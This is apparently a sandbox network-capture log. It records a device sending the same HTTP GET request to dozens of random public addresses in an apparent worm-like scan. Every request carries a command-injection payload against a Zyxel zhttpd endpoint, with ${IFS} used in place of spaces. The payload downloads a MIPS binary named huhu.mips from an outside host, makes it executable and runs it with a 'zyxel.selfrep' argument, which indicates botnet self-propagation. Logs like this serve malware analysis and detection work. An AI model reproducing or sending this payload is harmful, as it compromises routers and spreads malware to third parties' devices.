                                              Jan 29, 2024 07:03:48.987447977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4231192.168.2.1444236191.112.166.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.001823902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4232192.168.2.1452486203.26.38.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.001884937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4233192.168.2.1458972188.176.94.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.001924038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4234192.168.2.1459622120.114.205.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.001971960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4235192.168.2.1459894189.250.222.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002011061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4236192.168.2.1457336171.215.160.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002036095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4237192.168.2.144928831.103.161.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002085924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4238192.168.2.1440252102.22.74.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002130032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4239192.168.2.1455946152.180.224.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002162933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4240192.168.2.145722838.80.190.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002209902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4241192.168.2.1443146222.58.210.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002242088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4242192.168.2.1444192192.181.69.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002290964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4243192.168.2.1440992129.217.70.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002326965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4244192.168.2.1447712132.133.6.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002350092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4245192.168.2.145258652.187.137.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002387047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4246192.168.2.144954814.144.194.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002461910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4247192.168.2.144998668.29.142.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002506018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4248192.168.2.1437374192.203.39.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002506018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4249192.168.2.1445724191.92.213.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002547026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4250192.168.2.1435178104.17.225.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002593040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4251192.168.2.1452644156.76.37.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002640963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4252192.168.2.1454932144.153.209.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002660036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4253192.168.2.145417041.213.209.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002707958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4254192.168.2.1433436220.254.227.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002754927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4255192.168.2.145998640.214.153.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002798080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4256192.168.2.145876252.168.212.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002919912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4257192.168.2.143679640.200.243.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002955914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4258192.168.2.144351865.242.23.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.002979994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4259192.168.2.145795674.236.38.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003025055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4260192.168.2.145046675.169.179.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003067970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4261192.168.2.1453416196.219.125.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003104925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4262192.168.2.1451674163.249.96.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003135920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4263192.168.2.1450974141.123.30.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003181934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4264192.168.2.1448242106.121.204.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003220081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4265192.168.2.144990647.171.170.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003273964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4266192.168.2.143319289.151.92.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003299952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4267192.168.2.1453268109.221.176.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003343105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4268192.168.2.144790654.172.27.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003375053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4269192.168.2.1458340205.102.143.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003428936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4270192.168.2.1453904218.91.223.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003468037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4271192.168.2.1459596108.47.54.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003503084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4272192.168.2.1433488106.222.163.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003549099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4273192.168.2.1446742122.193.48.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003572941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4274192.168.2.1452226143.58.197.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003618956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4275192.168.2.145611474.238.147.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003654957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4276192.168.2.1445054149.250.169.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003686905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4277192.168.2.144570867.176.26.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003726959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4278192.168.2.143712445.207.0.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003760099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4279192.168.2.1452054112.104.210.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003801107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4280192.168.2.1458668216.192.24.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003844023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4281192.168.2.1442034107.13.14.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003909111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4282192.168.2.143464889.211.111.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003937960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4283192.168.2.1456828124.173.31.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003958941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4284192.168.2.144326657.146.180.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.003993034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4285192.168.2.1445906169.101.31.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004026890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4286192.168.2.1453898205.252.95.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004064083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4287192.168.2.145758019.184.6.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004118919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4288192.168.2.14381524.39.184.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004143953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4289192.168.2.1444948131.230.197.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004192114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4290192.168.2.1451078168.14.104.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004216909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4291192.168.2.1442072126.151.103.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004250050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4292192.168.2.145885618.112.119.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004302979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4293192.168.2.145790093.173.216.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004347086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4294192.168.2.145954465.11.94.57443
                                              TimestampBytes transferredDirectionData
